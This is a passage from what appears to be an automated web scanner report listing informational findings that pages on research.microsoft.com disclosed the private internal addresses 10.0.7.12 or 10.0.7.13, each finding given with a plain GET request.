22.88. http://research.microsoft.com/en-us/labs/asia/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/labs/asia/default.aspx

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.0.7.12

Request

GET /en-us/labs/asia/default.aspx HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

22.89. http://research.microsoft.com/en-us/labs/cambridge/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/labs/cambridge/default.aspx

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.0.7.13

Request

GET /en-us/labs/cambridge/default.aspx HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

22.90. http://research.microsoft.com/en-us/labs/cmic/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/labs/cmic/default.aspx

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.0.7.12

Request

GET /en-us/labs/cmic/default.aspx HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

22.91. http://research.microsoft.com/en-us/labs/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/labs/default.aspx

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.0.7.12

Request

Response

22.92. http://research.microsoft.com/en-us/labs/emic/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/labs/emic/default.aspx

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.0.7.13

Request

GET /en-us/labs/emic/default.aspx HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

22.93. http://research.microsoft.com/en-us/labs/fuse/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/labs/fuse/default.aspx

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.0.7.13

Request

GET /en-us/labs/fuse/default.aspx HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

22.94. http://research.microsoft.com/en-us/labs/ilabs/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/labs/ilabs/default.aspx

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.0.7.12

Request

GET /en-us/labs/ilabs/default.aspx HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

22.95. http://research.microsoft.com/en-us/labs/india/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/labs/india/default.aspx

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.0.7.13

Request

GET /en-us/labs/india/default.aspx HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

22.96. http://research.microsoft.com/en-us/labs/newengland/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/labs/newengland/

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.0.7.13

Request

GET /en-us/labs/newengland/ HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

22.97. http://research.microsoft.com/en-us/labs/newengland/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/labs/newengland/default.aspx

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.0.7.12

Request

GET /en-us/labs/newengland/default.aspx HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

22.98. http://research.microsoft.com/en-us/labs/redmond/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/labs/redmond/default.aspx

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.0.7.12

Request

GET /en-us/labs/redmond/default.aspx HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

22.99. http://research.microsoft.com/en-us/labs/siliconvalley/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/labs/siliconvalley/default.aspx

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.0.7.13

Request

GET /en-us/labs/siliconvalley/default.aspx HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

22.100. http://research.microsoft.com/en-us/labs/xcg/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/labs/xcg/default.aspx

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.0.7.13

Request

GET /en-us/labs/xcg/default.aspx HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

22.101. http://research.microsoft.com/en-us/news/features/2010interns-081610.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/news/features/2010interns-081610.aspx

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.0.7.12

Request

GET /en-us/news/features/2010interns-081610.aspx HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

22.102. http://research.microsoft.com/en-us/news/features/hoare-080411.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/news/features/hoare-080411.aspx

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.0.7.12

Request

GET /en-us/news/features/hoare-080411.aspx HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

22.103. http://research.microsoft.com/en-us/news/features/interns-080309.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/news/features/interns-080309.aspx

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.0.7.13

Request

GET /en-us/news/features/interns-080309.aspx HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

22.104. http://research.microsoft.com/en-us/news/features/interns2011-082511.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/news/features/interns2011-082511.aspx

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.0.7.13

Request

GET /en-us/news/features/interns2011-082511.aspx HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

22.105. http://research.microsoft.com/en-us/news/features/phillipstr35-082311.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/news/features/phillipstr35-082311.aspx

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.0.7.12

Request

Response

22.106. http://research.microsoft.com/en-us/news/features/siggraph2011awards.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/news/features/siggraph2011awards.aspx

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.0.7.12

Request

GET /en-us/news/features/siggraph2011awards.aspx HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

22.107. http://research.microsoft.com/en-us/news/features/speechrecognition-082911.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/news/features/speechrecognition-082911.aspx

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.0.7.13

Request

Response

22.108. http://research.microsoft.com/en-us/news/headlines/2011womenscholarships-012811.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/news/headlines/2011womenscholarships-012811.aspx

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.0.7.12

Request

Response

22.109. http://research.microsoft.com/en-us/news/headlines/ibukaaward-081511.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/news/headlines/ibukaaward-081511.aspx

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.0.7.12

Request

GET /en-us/news/headlines/ibukaaward-081511.aspx HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

22.110. http://research.microsoft.com/en-us/people/abadi/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/people/abadi/default.aspx

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.0.7.13

Request

GET /en-us/people/abadi/default.aspx HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

22.111. http://research.microsoft.com/en-us/people/adiamant/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/people/adiamant/default.aspx

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.0.7.13

Request

GET /en-us/people/adiamant/default.aspx HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

22.112. http://research.microsoft.com/en-us/people/ajbrush/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/people/ajbrush/default.aspx

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.0.7.12

Request

GET /en-us/people/ajbrush/default.aspx HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

22.113. http://research.microsoft.com/en-us/people/akashl/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/people/akashl/

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.0.7.13

Request

GET /en-us/people/akashl/ HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

22.114. http://research.microsoft.com/en-us/people/alecw/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/people/alecw/

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.0.7.12

Request

GET /en-us/people/alecw/ HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

22.115. http://research.microsoft.com/en-us/people/alexac/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/people/alexac/default.aspx

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.0.7.12

Request

GET /en-us/people/alexac/default.aspx HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

22.116. http://research.microsoft.com/en-us/people/aphillip/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/people/aphillip/

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.0.7.13

Request

GET /en-us/people/aphillip/ HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

22.117. http://research.microsoft.com/en-us/people/aproutie/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/people/aproutie/

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.0.7.13

Request

GET /en-us/people/aproutie/ HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

22.118. http://research.microsoft.com/en-us/people/aratan/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/people/aratan/default.aspx

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.0.7.13

Request

GET /en-us/people/aratan/default.aspx HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

22.119. http://research.microsoft.com/en-us/people/asellen/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/people/asellen/

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.0.7.13

Request

GET /en-us/people/asellen/ HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

22.120. http://research.microsoft.com/en-us/people/asellen/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/people/asellen/default.aspx

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.0.7.13

Request

GET /en-us/people/asellen/default.aspx HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

22.121. http://research.microsoft.com/en-us/people/bainguo/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/people/bainguo/default.aspx

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.0.7.13

Request

GET /en-us/people/bainguo/default.aspx HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

22.122. http://research.microsoft.com/en-us/people/bibuxton/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/people/bibuxton/default.aspx

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.0.7.13

Request

GET /en-us/people/bibuxton/default.aspx HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

22.123. http://research.microsoft.com/en-us/people/birrell/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/people/birrell/default.aspx

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.0.7.13

Request

GET /en-us/people/birrell/default.aspx HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

22.124. http://research.microsoft.com/en-us/people/blinn/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/people/blinn/default.aspx

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.0.7.12

Request

GET /en-us/people/blinn/default.aspx HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

22.125. http://research.microsoft.com/en-us/people/bycook/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/people/bycook/default.aspx

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.0.7.13

Request

GET /en-us/people/bycook/default.aspx HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

22.126. http://research.microsoft.com/en-us/people/cthacker/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/people/cthacker/default.aspx

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.0.7.13

Request

GET /en-us/people/cthacker/default.aspx HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

22.127. http://research.microsoft.com/en-us/people/dburger/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/people/dburger/

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.0.7.13

Request

GET /en-us/people/dburger/ HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

22.128. http://research.microsoft.com/en-us/people/dburger/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/people/dburger/default.aspx

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.0.7.13

Request

GET /en-us/people/dburger/default.aspx HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

22.129. http://research.microsoft.com/en-us/people/deng/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/people/deng/default.aspx

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.0.7.12

Request

GET /en-us/people/deng/default.aspx HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

22.130. http://research.microsoft.com/en-us/people/dmb/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/people/dmb/

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.0.7.13

Request

GET /en-us/people/dmb/ HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

22.131. http://research.microsoft.com/en-us/people/dmb/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/people/dmb/default.aspx

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.0.7.13

Request

GET /en-us/people/dmb/default.aspx HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

22.132. http://research.microsoft.com/en-us/people/dwork/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/people/dwork/

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.0.7.13

Request

GET /en-us/people/dwork/ HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

22.133. http://research.microsoft.com/en-us/people/gbell/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/people/gbell/default.aspx

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.0.7.13

Request

GET /en-us/people/gbell/default.aspx HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

22.134. http://research.microsoft.com/en-us/people/ggr/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/people/ggr/default.aspx

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.0.7.12

Request

GET /en-us/people/ggr/default.aspx HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

22.135. http://research.microsoft.com/en-us/people/goldberg/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/people/goldberg/default.aspx

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.0.7.13

Request

GET /en-us/people/goldberg/default.aspx HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

22.136. http://research.microsoft.com/en-us/people/grama/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/people/grama/default.aspx

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.0.7.13

Request

GET /en-us/people/grama/default.aspx HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

22.137. http://research.microsoft.com/en-us/people/gray/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/people/gray/

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.0.7.13

Request

GET /en-us/people/gray/ HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

22.138. http://research.microsoft.com/en-us/people/gray/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/people/gray/default.aspx

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.0.7.12

Request

GET /en-us/people/gray/default.aspx HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

22.139. http://research.microsoft.com/en-us/people/hon/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/people/hon/default.aspx

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.0.7.13

Request

GET /en-us/people/hon/default.aspx HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

22.140. http://research.microsoft.com/en-us/people/horvitz/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/people/horvitz/default.aspx

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.0.7.13

Request

GET /en-us/people/horvitz/default.aspx HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

22.141. http://research.microsoft.com/en-us/people/hsalama/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/people/hsalama/default.aspx

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.0.7.13

Request

GET /en-us/people/hsalama/default.aspx HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

22.142. http://research.microsoft.com/en-us/people/hshum/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/people/hshum/default.aspx

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.0.7.13

Request

GET /en-us/people/hshum/default.aspx HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

22.143. http://research.microsoft.com/en-us/people/indranim/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/people/indranim/

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.0.7.13

Request

GET /en-us/people/indranim/ HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

22.144. http://research.microsoft.com/en-us/people/jamiesho/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/people/jamiesho/

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.0.7.13

Request

GET /en-us/people/jamiesho/ HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

22.145. http://research.microsoft.com/en-us/people/jbishop/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/people/jbishop/default.aspx

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.0.7.13

Request

GET /en-us/people/jbishop/default.aspx HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

22.146. http://research.microsoft.com/en-us/people/jiansun/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/people/jiansun/default.aspx

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.0.7.13

Request

GET /en-us/people/jiansun/default.aspx HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

22.147. http://research.microsoft.com/en-us/people/johndo/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/people/johndo/default.aspx

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.0.7.13

Request

GET /en-us/people/johndo/default.aspx HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

22.148. http://research.microsoft.com/en-us/people/jplatt/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/people/jplatt/default.aspx

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.0.7.13

Request

GET /en-us/people/jplatt/default.aspx HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

22.149. http://research.microsoft.com/en-us/people/jtw/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/people/jtw/default.aspx

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.0.7.12

Request

GET /en-us/people/jtw/default.aspx HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

22.150. http://research.microsoft.com/en-us/people/krw/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/people/krw/default.aspx

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.0.7.12

Request

GET /en-us/people/krw/default.aspx HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

22.151. http://research.microsoft.com/en-us/people/kstrauss/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/people/kstrauss/

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.0.7.13

Request

GET /en-us/people/kstrauss/ HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

22.152. http://research.microsoft.com/en-us/people/larus/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/people/larus/default.aspx

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.0.7.13

Request

GET /en-us/people/larus/default.aspx HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

22.153. http://research.microsoft.com/en-us/people/lilich/ previous next

Summary

Severity:	Information
